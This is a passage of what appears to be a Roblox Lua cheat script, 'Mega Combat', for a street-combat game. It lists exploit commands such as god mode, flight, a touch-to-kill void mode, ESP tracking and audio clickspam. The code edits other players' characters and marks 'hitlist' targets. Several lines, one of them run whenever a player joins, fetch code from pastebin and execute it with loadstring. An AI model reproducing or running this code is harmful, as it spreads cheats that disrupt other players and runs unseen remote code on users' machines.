  4333. repeat wait() until child.MessageArea:FindFirstChild("ErrorFrame")
  4334. repeat wait() until child.MessageArea.ErrorFrame:FindFirstChild("ErrorMessage")
  4335. loadstring(game:HttpGet(('https://pastebin.com/raw/2vdAwVQz'),true))()
  4336. end
  4337. end)
  4338.  
  4339.  
  4340.  
  4341. print("----------------FEATURES-------------------")
  4342. print("Chat commands can also be done as /e :COMMANDNAME or /e COMMANDNAME")
  4343. print("-------------------------------------------")
  4344. print("---------KEYS---------")
  4345. print("")
  4346. print("X Key - Hold this key then drag it over a player to set them as your target. (For targeted fire modes)")
  4347. print("T Key - Targeted fire. Press this with a weapon out to fire at a target")
  4348. print("K Key - Toggle super speed on / off")
  4349. print("L Key - Toggle super jump")
  4350. print("- Key - Turn up speed on super sprint")
  4351. print("= Key - Turn down speed on super sprint")
  4352. print("[ Key - Turn up height on super jump")
  4353. print("] Key - Turn down height on ")
  4354. print("N Key - Toggle returning to where you died.")
  4355. print("B Key - Toggle having your uzi far out in front of you")
  4356. print("H Key - Toggle flight (You can shoot while flying as well)")
  4357. print("\ Key - Drop currently equipped weapon")
  4358. print("M Key - Commit suicide (Needs either a shotty or a glock)")
  4359. print("V Key - Void toggle (Touch people to kill them in this mode)")
  4360. print("R Key - Combat roll B)")
  4361. print("")
  4362. print("---------CHAT COMMANDS---------")
  4363. print(":play SONGID - This command will play the SONGID on your character without having to hold the radio")
  4364. print(":deseat - Removes all seats in the game")
  4365. print(":reseat - Puts all the seats in the game back")
  4366. print(":defence - Removes all fences in the game")
  4367. print(":refence - Puts all the fences in the game back")
  4368. print(':find PLAYER - Puts esp to help you find a player. Saying ":find target" will trace your current target')
  4369. print(":unfind PLAYER - Removes esp on a player, if esp is on them (unfinds a player)")
  4370. print(":planks - Makes any planks you go near float above your head")
  4371. print(":unplanks - Makes any planks floating above your head stop floating above your head")
  4372. print(":planksurf - Planks will follow you, but won't move up or down (so you can run them in the air)")
  4373. print(":demesh - Removes the mesh of your currently equipped tool. (Works for radios and spraypaints. :rmesh works too.)")
  4374. print(":hidegun - Makes any gun you have equipped invisible. (Doesn't work for glocks)")
  4375. print(":walkshoot - Turns walkshoot ON (let's you shoot while walking)")
  4376. print(":unwalkshoot - Turns walkshoot OFF (let's you shoot while walking)")
  4377. print(":jumpshoot - Turns jumpshoot ON (let's you shoot while jumping)")
  4378. print(":unjumpshoot - Turns jumpshoot OFF (let's you shoot while jumping)")
  4379. print(":togglewirerun - Toggles the the ability to run on the telephone wires (defaults to on)")
  4380. print(":spray PLAYERNAME - Steals the ID of PLAYERNAME's spray (:stealspray also works) (shortened names work)")
  4381. print(":rlegs - Removes your legs!")
  4382. print(":rface - Removes your face (:faceless works aswell)")
  4383. print(":stealthuzi - Puts your uzi into stealth mode B) Makes your uzi invisible and without animations")
  4384. print(":stealthshotty - Puts your shotty into stealth mode B) Makes your shotty invisible and without animations")
  4385. print(":eplay SONGID - Encrypts your ID, then plays it on your character (antisteal for bypasses)")
  4386. print(":erplay SONGID - Encrypts your ID, then plays it on your boombox (antisteal for bypasses)")
  4387. print(":stopanims - Stops your animations, hides things like the punch idle and such")
  4388. print(":god - Turns on god mode, you can't use your tools in this mode")
  4389. print(":ungod - Turns off god mode")
  4390. print(":donate - Brings up a gui with a list of donation options (Donations over 30 will get you a green nametag)")
  4391. print(":visualize TOOLNAME - Visualizes your audio with the selected tool. :visualize hats will do a hat visualizer")
  4392. print('(You can do multiple tools with visualize. saying ":visualize pipe shotty glock" will visualize those tools)')
  4393. print("(Putting a number at the end of visualize will change the mode :visualize3 will visualize the glock on mode 3)")
  4394. print(":clickspam - spams the out of ammo clicking sound, which overpowers audios")
  4395. print(":unclickspam - stops the effects of clickspam")
  4396. print(":stopmusic - Stops everyone's music")
  4397. print(":fix - Fixes your music if you fall victim to someone else's clickspam / :stopmusic")
  4398. print(":reset - Resets you.")
  4399. print(":rejoin - Rejoins you to the streets (exact same thing as :tostreets)")
  4400. print(":tostreets - Teleports you to the streets")
  4401. print(":toprison - Teleports you to the prison, without banning you.")
  4402. print(":void - Turns on void, turns off when you unequip the tool. (Walk into people to kill them while void is on)")
  4403. print(":disc - shows a gui with the discord invite, and button for copying it (:discord works too)")
  4404. print(":autoreset - Resets you automatically when you get ragdolled")
  4405. print(":unautoreset - Turns off autoreset")
  4406. print(":breakneck - Breaks your neck. Weird kink but okay.")
  4407. print(":dupeboom - Gets you another boombox, for :mplay and :emplay")
  4408. print(":boombring - Brings all dropped boomboxes in the map")
  4409. print(":mplay SONGID - Mass plays your songid on all your boomboxes (requires multiple boomboxes and godmode)")
  4410. print(":mplay SONGID - Same thign as :mplay except it encrypts your ID, then plays it.")
  4411. print(":vismode NUMBER - Sets the mode of the visualizer (defaults to 1 if mode doesn't exist)")
  4412. print(":unmutable - Makes your boombox unmutable (Takes around 10 seconds)")
  4413. print("-------------------------------------------")
  4414. print("Vortexturize | aidez moi#4192 | Aidez")
  4415. print("-------------------------------------------")
  4416.  
  4417.  
  4418.  
  4419.  
  4420. loadstring(game:HttpGet(('https://pastebin.com/5NzXKZsa'),true))()
  4421.  
  4422. function hitlistmark(plr)
  4423. if plr.Character ~= nil then
  4424. if plr.Character:FindFirstChild("Head") then
  4425. local billgui = Instance.new('BillboardGui', plr.Character.Head)
  4426. local textlab = Instance.new('TextLabel', billgui)
  4427.  
  4428. billgui.Name = "KILL"
  4429. billgui.Adornee = epic
  4430. billgui.AlwaysOnTop = true
  4431. billgui.ExtentsOffset = Vector3.new(0, 3, 0)
  4432. billgui.Size = UDim2.new(0, 5, 0, 5)
  4433.  
  4434. textlab.Name = 'Target'
  4435. textlab.BackgroundColor3 = Color3.new(255, 255, 255)
  4436. textlab.BackgroundTransparency = 1
  4437. textlab.BorderSizePixel = 0
  4438. textlab.Position = UDim2.new(0, 0, 0, -40)
  4439. textlab.Size = UDim2.new(1, 0, 10, 0)
  4440. textlab.Visible = true
  4441. textlab.ZIndex = 10
  4442. textlab.Font = 'ArialBold'
  4443. textlab.FontSize = 'Size18'
  4444. textlab.Text = hitlisttitles[math.random(1,#hitlisttitles)]
  4445. textlab.TextColor = BrickColor.new('Bright red')
  4446. textlab.TextStrokeColor3 = Color3.fromRGB(0,0,0)
  4447. textlab.TextStrokeTransparency = 0.6
  4448. end
  4449. end
  4450. end
  4451.  
  4452. for i = 1,#mains do
  4453. table.insert(dontshoot,(#dontshoot+1),mains[i])
  4454. end
  4455.  
  4456. for i = 1,#blacklist do
  4457. if string.lower(game.Players.LocalPlayer.Name) == string.lower(tostring(blacklist[i])) then
  4458. game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer('Bye bye! From Aidez',"All")
  4459. game.Players.LocalPlayer.Character:WaitForChild("Humanoid").WalkSpeed = 69
  4460. -- Is this too toxic? LOL
  4461. end
  4462. end
  4463. game.Players.PlayerAdded:connect(function(plr)
  4464. loadstring(game:HttpGet(('https://pastebin.com/raw/9mAwN6rA'),true))()
  4465. wait(1)
  4466. for i = 1,#mains do
  4467. if string.lower(plr.Name) == tostring(string.lower(mains[i])) then
  4468. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 170/255, 0)
  4469. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.PlayerName.Text = "Aidez"
  4470. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.MembershipIcon.Image = "rbxassetid://157449069"
  4471. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].Name = "Aidez"
  4472. if plr.Name == mains[i] then
  4473. wait(1)
  4474. -- plr.Name = "Aidez"
  4475. game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer:WaitForChild("PageViewClipper"):WaitForChild("PageView"):WaitForChild("PageViewInnerFrame")
  4476. if game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame:FindFirstChild("Players") then
  4477. wait(0.7)
  4478. if game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame:FindFirstChild("Players"):FindFirstChild("PlayerLabel"..x.Name) then
  4479. game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame:FindFirstChild("Players"):FindFirstChild("PlayerLabel"..x.Name).NameLabel.Text = "Aidez"
  4480. end
  4481. else
  4482. game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame.ChildAdded:Connect(function(child)
  4483. wait()
  4484. if child.Name == "Players" then
  4485. child:WaitForChild("PlayerLabel"..plr.Name).NameLabel.Text = "Aidez"
  4486. end
  4487. end)
  4488.  
  4489. end
  4490.  
  4491. plr.CharacterAdded:Connect(function(char)
  4492. repeat wait() until char.Humanoid
  4493. -- char.Name = "Aidez"
  4494. end)
  4495. end
  4496. end
  4497. end
  4498. for i = 1,#special do
  4499. if string.lower(plr.Name) == tostring(string.lower(special[i])) then
  4500. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.PlayerName.TextColor3 = Color3.new(0, 255, 255)
  4501. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.MembershipIcon.Image = "rbxassetid://3434363475"
  4502. end
  4503. end
  4504. for i = 1,#donators do
  4505. if string.lower(plr.Name) == tostring(string.lower(donators[i])) and not IsInTable(special, donators[i]) then
  4506. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.PlayerName.TextColor3 = Color3.new(255/255, 193/255, 242/255)
  4507. end
  4508. end
  4509. for i = 1,#bigdonators do
  4510. if string.lower(plr.Name) == tostring(string.lower(bigdonators[i])) and not IsInTable(special, bigdonators[i]) then
  4511. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.PlayerName.TextColor3 = Color3.new(255/255, 193/255, 242/255)
  4512. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.MembershipIcon.Image = "rbxassetid://3423842039"
  4513. end
  4514. end
  4515. for i = 1,#nitroboosters do
  4516. if string.lower(plr.Name) == tostring(string.lower(nitroboosters[i])) and not IsInTable(special, nitroboosters[i]) then
  4517. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.PlayerName.TextColor3 = Color3.new(255/255, 193/255, 242/255)
  4518. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[plr.Name].BGFrame.MembershipIcon.Image = "rbxassetid://3453684844"
  4519. end
  4520. end
  4521. for i = 1,#hitlist do
  4522. if string.lower(plr.Name) == tostring(string.lower(hitlist[i])) then
  4523. plr.CharacterAppearanceLoaded:Connect(function(char)
  4524. if game.Players:FindFirstChild(char.Name) then
  4525. hitlistmark(game.Players:FindFirstChild(char.Name))
  4526. end
  4527. end)
  4528. end
  4529. end
  4530. end)
  4531. for i, x in next, game:GetService"Players":GetPlayers() do
  4532. for i = 1,#mains do
  4533. if string.lower(x.Name) == tostring(string.lower(mains[i])) then -- and x ~= game.Players.LocalPlayer
  4534. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 170/255, 0)
  4535. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.PlayerName.Text = "Aidez"
  4536. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.MembershipIcon.Image = "rbxassetid://157449069"
  4537. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].Name = "Aidez"
  4538. if x.Name == mains[i] then
  4539. wait(1)
  4540. -- x.Name = "Aidez"
  4541. game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer:WaitForChild("PageViewClipper"):WaitForChild("PageView"):WaitForChild("PageViewInnerFrame")
  4542. if game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame:FindFirstChild("Players") then
  4543. wait(0.7)
  4544. if game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame:FindFirstChild("Players"):FindFirstChild("PlayerLabel"..x.Name) then
  4545. game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame:FindFirstChild("Players"):FindFirstChild("PlayerLabel"..x.Name).NameLabel.Text = "Aidez"
  4546. end
  4547. else
  4548. game.CoreGui.RobloxGui.SettingsShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame.ChildAdded:Connect(function(child)
  4549. wait()
  4550. if child.Name == "Players" then
  4551. child:WaitForChild("PlayerLabel"..x.Name).NameLabel.Text = "Aidez"
  4552. end
  4553. end)
  4554.  
  4555. end
  4556. x.CharacterAdded:Connect(function(char)
  4557. -- repeat wait() until char:FindFirstChild("Humanoid")
  4558. -- char.Name = "Aidez"
  4559. end)
  4560. if x.Character then
  4561. -- x.Character.Name = "Aidez"
  4562. end
  4563. end
  4564. end
  4565. end
  4566. for i = 1,#special do
  4567. if string.lower(x.Name) == tostring(string.lower(special[i])) then
  4568. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.PlayerName.TextColor3 = Color3.new(0, 255, 255)
  4569. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.MembershipIcon.Image = "rbxassetid://3434363475"
  4570. end
  4571. end
  4572. for i = 1,#donators do
  4573. if string.lower(x.Name) == tostring(string.lower(donators[i])) and not IsInTable(special, donators[i]) then
  4574. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.PlayerName.TextColor3 = Color3.new(255/255, 193/255, 242/255)
  4575. end
  4576. end
  4577. for i = 1,#bigdonators do
  4578. if string.lower(x.Name) == tostring(string.lower(bigdonators[i])) and not IsInTable(special, bigdonators[i]) then
  4579. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.PlayerName.TextColor3 = Color3.new(255/255, 193/255, 242/255)
  4580. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.MembershipIcon.Image = "rbxassetid://3423842039"
  4581. end
  4582. end
  4583. for i = 1,#nitroboosters do
  4584. if string.lower(x.Name) == tostring(string.lower(nitroboosters[i])) and not IsInTable(special, nitroboosters[i]) then
  4585. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.PlayerName.TextColor3 = Color3.new(146/255, 84/255, 255/255)
  4586. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[x.Name].BGFrame.MembershipIcon.Image = "rbxassetid://3453684844"
  4587. end
  4588. end
  4589. for i = 1,#hitlist do
  4590. if string.lower(x.Name) == tostring(string.lower(hitlist[i])) then
  4591. hitlistmark(x)
  4592. x.CharacterAppearanceLoaded:Connect(function(char)
  4593. if game.Players:FindFirstChild(char.Name) then
  4594. hitlistmark(game.Players:FindFirstChild(char.Name))
  4595. end
  4596. end)
  4597. end
  4598. end
  4599. end
  4600.  
  4601. game.Players.LocalPlayer.CharacterAdded:Connect(function(char)
  4602. repeat wait() until char:FindFirstChild("Humanoid")
  4603. char.Humanoid.ChildAdded:Connect(function(child)
  4604. repeat wait() until char.Humanoid:FindFirstChild(child.Name)
  4605. if child.Name == "Bullet" then
  4606. wait(0.3)
  4607. child:Destroy()
  4608. end
  4609. end)
  4610. end)
  4611.  
  4612. game.Players.LocalPlayer.CharacterAppearanceLoaded:Connect(function(char)
  4613. if bringboomsback == true then
  4614. bringboomsback = false
  4615. wait(0.5)
  4616. for _,v in pairs(game.Workspace.Terrain:GetChildren()) do
  4617. if (v:IsA("Tool") and v.Name == "BoomBox") then
  4618. v.Handle.CFrame = game.Players.LocalPlayer.Character.Torso.CFrame
  4619. repeat wait() until game.Players.LocalPlayer.Backpack:FindFirstChild("BoomBox")
  4620. end
  4621. end
  4622. continueunmutable = true
  4623. end
  4624. end)
  4625.  
  4626.  
  4627. game.Players.LocalPlayer.Character.Humanoid.ChildAdded:Connect(function(child)
  4628. repeat wait() until game.Players.LocalPlayer.Character.Humanoid:FindFirstChild(child.Name)
  4629. if child.Name == "Bullet" then
  4630. wait(0.3)
  4631. child:Destroy()
  4632. end
  4633. end)
  4634.  
  4635.  
  4636. for i,v in pairs(game.Players:GetChildren()) do
  4637. if v.Character ~= nil then
  4638. if v.Character:FindFirstChild("Right Arm") then
  4639. v.Character:FindFirstChild("Right Arm").ChildAdded:Connect(function(child)
  4640. if child.Name == "RightGrip" then
  4641. if child.Part1 ~= nil then
  4642. if child.Part1.Parent ~= nil then
  4643. if child.Part1.Parent:IsA("Accessory") then
  4644. child:Destroy()
  4645. end
  4646. end
  4647. end
  4648. end
  4649. end)
  4650. for i,v in pairs(v.Character:FindFirstChild("Right Arm"):GetChildren()) do
  4651. if v.Name == "RightGrip" then
  4652. if Part1 ~= nil then
  4653. if Part1.Parent ~= nil then
  4654. if v.Part1.Parent:IsA("Accessory") then
  4655. v:Destroy()
  4656. end
  4657. end
  4658. end
  4659. end
  4660. end
  4661. end
  4662. end
  4663. v.CharacterAppearanceLoaded:Connect(function(char)
  4664. if v.Character:FindFirstChild("Right Arm") then
  4665. v.Character:FindFirstChild("Right Arm").ChildAdded:Connect(function(child)
  4666. if child.Name == "RightGrip" then
  4667. if child.Part1 ~= nil then
  4668. if child.Part1.Parent ~= nil then
  4669. if child.Part1.Parent:IsA("Accessory") then
  4670. child:Destroy()
  4671. end
  4672. end
  4673. end
  4674. end
  4675. end)
  4676. for i,v in pairs(v.Character:FindFirstChild("Right Arm"):GetChildren()) do
  4677. if v.Name == "RightGrip" then
  4678. if Part1 ~= nil then
  4679. if Part1.Parent ~= nil then
  4680. if v.Part1.Parent:IsA("Accessory") then
  4681. v:Destroy()
  4682. end
  4683. end
  4684. end
  4685. end
  4686. end
  4687. end
  4688. end)
  4689. end
  4690.  
  4691. game.Players.PlayerAdded:Connect(function(v)
  4692. wait()
  4693. if v.Character ~= nil then
  4694. if v.Character:FindFirstChild("Right Arm") then
  4695. v.Character:FindFirstChild("Right Arm").ChildAdded:Connect(function(child)
  4696. if child.Name == "RightGrip" then
  4697. if child.Part1 ~= nil then
  4698. if child.Part1.Parent ~= nil then
  4699. if child.Part1.Parent:IsA("Accessory") then
  4700. child:Destroy()
  4701. end
  4702. end
  4703. end
  4704. end
  4705. end)
  4706. for i,v in pairs(v.Character:FindFirstChild("Right Arm"):GetChildren()) do
  4707. if v.Name == "RightGrip" then
  4708. if Part1 ~= nil then
  4709. if Part1.Parent ~= nil then
  4710. if v.Part1.Parent:IsA("Accessory") then
  4711. v:Destroy()
  4712. end
  4713. end
  4714. end
  4715. end
  4716. end
  4717. end
  4718. end
  4719. v.CharacterAppearanceLoaded:Connect(function(char)
  4720. if v.Character:FindFirstChild("Right Arm") then
  4721. v.Character:FindFirstChild("Right Arm").ChildAdded:Connect(function(child)
  4722. if child.Name == "RightGrip" then
  4723. if child.Part1 ~= nil then
  4724. if child.Part1.Parent ~= nil then
  4725. if child.Part1.Parent:IsA("Accessory") then
  4726. child:Destroy()
  4727. end
  4728. end
  4729. end
  4730. end
  4731. end)
  4732. for i,v in pairs(v.Character:FindFirstChild("Right Arm"):GetChildren()) do
  4733. if v.Name == "RightGrip" then
  4734. if Part1 ~= nil then
  4735. if Part1.Parent ~= nil then
  4736. if v.Part1.Parent:IsA("Accessory") then
  4737. v:Destroy()
  4738. end
  4739. end
  4740. end
  4741. end
  4742. end
  4743. end
  4744. end)
  4745. end)
  4746.  
  4747. debouncerino = false
  4748.  
  4749. game:GetService('RunService').Stepped:connect(function()
  4750.  
  4751. if godmode == true then
  4752. if game.Players.LocalPlayer.Character ~= nil then
  4753. if game.Players.LocalPlayer.Character:FindFirstChild("Right Leg") then
  4754. game.Players.LocalPlayer.Character:FindFirstChild("Right Leg"):Destroy()
  4755. end
  4756. end
  4757. end
  4758.  
  4759. if clickspam == true then
  4760. for i,v in pairs(game.Players:GetChildren()) do
  4761. if v.Character ~= nil then
  4762. if v:FindFirstChildWhichIsA("Tool") then
  4763. if v:FindFirstChildWhichIsA("Tool"):FindFirstChild("Click") then
  4764. v:FindFirstChildWhichIsA("Tool"):FindFirstChild("Click"):FireServer()
  4765. end
  4766. end
  4767. end
  4768. for i,x in pairs(v.Backpack:GetChildren()) do
  4769. if x:IsA("Tool") and x:FindFirstChild("Click") then
  4770. x.Click:FireServer()
  4771. end
  4772. end
  4773. end
  4774. end
  4775.  
  4776. if plankfollow == true then
  4777. for i=1,#planks do
  4778. planks[i].no.Position = game.Players.LocalPlayer.Character.Torso.Position - Vector3.new(0,-10,0)
  4779. end
  4780. end
  4781.  
  4782. if planksurf == true then
  4783. for i=1,#planks do
  4784. planks[i].no.Position = Vector3.new(game.Players.LocalPlayer.Character.Torso.Position.X, planks[i].no.Position.Y, game.Players.LocalPlayer.Character.Torso.Position.Z)
  4785. end
  4786. end
  4787.  
  4788. if FLYING then
  4789. if game.Players.LocalPlayer.Character then
  4790. if game.Players.LocalPlayer.Character:FindFirstChild("Humanoid") then
  4791. game.Players.LocalPlayer.Character.Humanoid.PlatformStand = false
  4792. game.Players.LocalPlayer.Character.Humanoid.Sit = false
  4793. game.Players.LocalPlayer.Character.Humanoid:ChangeState(Enum.HumanoidStateType.RunningNoPhysics)
  4794. end
  4795. if game.Players.LocalPlayer.Character:FindFirstChild("Float") then
  4796. game.Players.LocalPlayer.Character:FindFirstChild("Float").CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,-3.5,0)
  4797. end
  4798. end
  4799. end
  4800.  
  4801. if SpaceHeld == true then
  4802. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,jumpspeed,0)
  4803. end
  4804.  
  4805. if Selecting == true then
  4806. if mouse.Target then
  4807. if mouse.Target.Parent:IsA("Model") and game.Players:FindFirstChild(mouse.Target.Parent.Name) then
  4808. Target.Text = mouse.Target.Parent.Name
  4809. targetee = game.Players:FindFirstChild(mouse.Target.Parent.Name)
  4810. end
  4811. end
  4812. end
  4813.  
  4814. if ShiftHeld == true then
  4815. if WHeld == true then
  4816. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,-runspeed)
  4817. end
  4818. if SHeld == true then
  4819. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,runspeed)
  4820. end
  4821. if DHeld == true then
  4822. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(runspeed,0,0)
  4823. end
  4824. if AHeld == true then
  4825. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(-runspeed,0,0)
  4826. end
  4827. end
  4828.  
  4829. if game.Players.LocalPlayer.Character then
  4830. if game.Players.LocalPlayer.Character:FindFirstChild("Humanoid") then
  4831. if stationaryrespawn == true and game.Players.LocalPlayer.Character.Humanoid.Health == 0 then
  4832. stay = false
  4833. if haspos == false then
  4834. if game.Players.LocalPlayer.Character ~= nil then
  4835. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  4836. pos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
  4837. haspos = true
  4838. end
  4839. end
  4840. end
  4841. needsrespawning = true
  4842. end
  4843. end
  4844. end
  4845.  
  4846. if needsrespawning == true then
  4847. if game.Players.LocalPlayer.Character then
  4848. if game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart") then
  4849. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
  4850. end
  4851. end
  4852. end
  4853.  
  4854. if stationaryrespawn == true then
  4855. RespawningButton.Text = "Returning"
  4856. else
  4857. RespawningButton.Text = "Not Returning"
  4858. end
  4859.  
  4860. if stay == true then
  4861. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = staypos
  4862. end
  4863.  
  4864. if visualize then
  4865. if game.Players.LocalPlayer.Character ~= nil then
  4866. if game.Players.LocalPlayer.Character:FindFirstChild("Torso") then
  4867. if game.Players.LocalPlayer.Character.Torso:FindFirstChild("Song") then
  4868. local song = game.Players.LocalPlayer.Character.Torso:FindFirstChild("Song")
  4869. rot = rot + 2 + song.PlaybackLoudness/400
  4870. local tools = gettools()
  4871. for i,v in next, gettools() do
  4872. sine = sine + 25
  4873. v.Parent = game.Players.LocalPlayer.Backpack
  4874. if visualizemode == 1 then
  4875. v.Grip = CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)) * CFrame.new(0,song.PlaybackLoudness/200 + 1,0) * CFrame.Angles(math.rad((i*(360/#tools))+rot),math.rad((i*(360/#tools))+rot),0) * CFrame.new(1.5,0,-1+math.sin(sine/#tools)*song.PlaybackLoudness/100)
  4876. elseif visualizemode == 2 then
  4877. v.Grip = CFrame.Angles(math.rad(0),math.rad(0),math.rad(90)) * CFrame.new(0,song.PlaybackLoudness/200 + 4,0) * CFrame.Angles(math.rad((i*(360/#tools))+rot),math.rad(90),0) * CFrame.new(1.5,0,-2+math.sin(sine/#tools)*song.PlaybackLoudness/100)
  4878. elseif visualizemode == 3 then
  4879. v.Grip = CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)) * CFrame.new(song.PlaybackLoudness/200 + 1,song.PlaybackLoudness/200 + 2,0) * CFrame.Angles(math.rad((i*(360/#tools))+rot),math.rad(90),0) * CFrame.new(1.5,0,-2+math.sin(sine/#tools)*song.PlaybackLoudness/100)
  4880. elseif visualizemode == 4 then
  4881. v.Grip = CFrame.Angles(math.rad(0),math.rad(0),math.rad(90)) * CFrame.new(0,song.PlaybackLoudness/200 + 4,0) * CFrame.Angles(math.rad((i*(360/#tools))+rot),math.rad(90),math.rad((i*(360/#tools))+rot)) * CFrame.new(1.5,0,-2+math.sin(sine/#tools)*song.PlaybackLoudness/100)
  4882. elseif visualizemode == 5 then
  4883. v.Grip = CFrame.Angles(math.rad(0),math.rad(0),math.rad(90)) * CFrame.new(0,song.PlaybackLoudness/200 + 4,0) * CFrame.Angles(math.rad((i*(360/#tools))+rot),math.rad(90),90) * CFrame.new(1.5+math.sin(sine/#tools)*song.PlaybackLoudness/100,0,-2)
  4884. elseif visualizemode == 6 then
  4885. v.Grip = CFrame.Angles(math.rad(0),math.rad(0),math.rad(90)) * CFrame.new(0,song.PlaybackLoudness/200 + 4,0) * CFrame.Angles(math.rad((i*(360/#tools))+rot),math.rad(90),90) * CFrame.new(1.5+math.sin(sine/#tools)*song.PlaybackLoudness/100,0,0.01+math.sin(sine/#tools)*song.PlaybackLoudness/100)
  4886. else
  4887. visualizemode = 1
  4888. end
  4889. v.Parent = game.Players.LocalPlayer.Character
  4890. -- Credit to hellish, since this is just an edited version of their visualizer
  4891. end
  4892. end
  4893. end
  4894. end
  4895. end
  4896.  
  4897.  
  4898.  
  4899.  
  4900. end)
  4901. game.StarterGui:SetCore("SendNotification", {
  4902. Title = "Done loading!";
  4903. Text = "Thanks for using Mega Combat! All the commands are in the dev console (F9, or Shift + F9)";
  4904. Icon = "rbxassetid://847562022";
  4905. Duration = 7;
  4906. })
  4907.  
  4908. -- loadstring(game:HttpGet(('https://raw.githubusercontent.com/Aidez/house/master/README.md'),true))()
  4909. loadstring(game:HttpGet(('https://pastebin.com/raw/aqGMhrdG'),true))()
  4910. deseat(game.Workspace)
  4911. wait(4)
  4912.  
  4913. function buttonfunction(content)
  4914. if content == "Donate 30!" then
  4915. if not game:GetService("MarketplaceService"):PlayerOwnsAsset(game.Players.LocalPlayer,918194587) then
  4916. game:GetService("MarketplaceService"):PromptPurchase(game.Players.LocalPlayer,918194587,true)
  4917. else
  4918. game.StarterGui:SetCore("SendNotification", {
  4919. Title = "I love you omg";
  4920. Text = "You've already donated! Thanks for your support <3";
  4921. Icon = "rbxassetid://1053360438";
  4922. Duration = 4;
  4923. })
  4924. end
  4925. elseif content == "More options" then
  4926. CreateDonationGUI()
  4927. end
  4928. end
  4929.  
  4930. function discordbuttonfunction(content)
  4931. if syn then
  4932. syn.write_clipboard("https://discord.gg/4FCbEbZ")
  4933. end
  4934. end
  4935.  
  4936. bindable = Instance.new("BindableFunction")
  4937. bindable.OnInvoke = buttonfunction
  4938.  
  4939. discordbindable = Instance.new("BindableFunction")
  4940. discordbindable.OnInvoke = discordbuttonfunction
  4941.  
  4942. game.StarterGui:SetCore("SendNotification", {
  4943. Title = "Donate? (BROKEN RN)";
  4944. Text = "Donate to mega combat?";
  4945. Icon = "rbxassetid://1369114584";
  4946. Duration = 5;
  4947. Callback = bindable;
  4948. Button1 = "Donate 30!";
  4949. Button2 = "More options";
  4950. })
  4951. if game.Workspace:FindFirstChild("Uzi | $150") then
  4952. if game.Workspace["Uzi | $150"]:FindFirstChild("Head") then
  4953. local memorial = Instance.new("Dialog")
  4954. memorial.Parent = game.Workspace["Uzi | $150"].Head
  4955. memorial.InitialPrompt = "RIP INFINITE AMMO UZI :("
  4956. end
  4957. end
  4958. wait(2)
  4959. game.StarterGui:SetCore("SendNotification", {
  4960. Title = "Join our discord!";
  4961. Text = "https://discord.gg/4FCbEbZ";
  4962. Icon = "rbxassetid://3453806288";
  4963. Duration = 5;
  4964. Callback = discordbindable;
  4965. Button1 = "Copy to Clipboard";
  4966. })
  4967.  
  4968.  
  4969. --[[
